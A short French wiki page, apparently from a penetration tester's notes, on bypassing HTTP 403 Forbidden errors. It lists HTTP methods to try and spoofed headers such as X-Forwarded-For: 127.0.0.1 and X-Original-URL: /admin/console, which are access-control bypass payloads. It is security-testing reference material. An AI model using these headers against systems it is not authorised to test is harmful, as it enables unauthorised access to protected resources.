

# [Exploitation/Web] Bypass 403

## Introduction

Il arrive parfois que certaines ressources soient protégées sur des applications web et que lorsque vous essayez d'y accéder, vous obteniez l'erreur **403 Forbidden**.

Dans ce cas précis, il est parfois possible de contourner les sécurités mises en place pour quand même accéder à la ressource.

### Forbidden

You don't have permission to access this resource.

*Apache/2.4.41 (Ubuntu) Server at beta.example.com Port 80*

## Source

- [Hacktricks - 403 & 401 Bypasses](#)

## Méthodes

Voici la liste des méthodes que vous pouvez essayer de modifier dans l'entête HTTP avec **BurpSuite** :

GET

HEAD

POST

PUT

DELETE

CONNECT

OPTIONS

TRACE

PATCH

INVENTED

HACK

# HTTP Headers

X-Originating-IP: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Forwarded: 127.0.0.1

Forwarded-For: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-ProxyUser-Ip: 127.0.0.1

X-Original-URL: 127.0.0.1

Client-IP: 127.0.0.1

True-Client-IP: 127.0.0.1

True-Client-IP: 127.0.0.1

X-ProxyUser-Ip: 127.0.0.1

Host: localhost

X-Original-URL: /admin/console

X-Rewrite-URL: /admin/console

Pour tester toutes ces en-têtes automatiquement, vous pouvez utiliser le script **[fuzzhttpbypass](#)**.

---

Revision #4

Created 6 February 2024 20:23:12 by Elieroc

Updated 3 May 2024 13:21:19 by Elieroc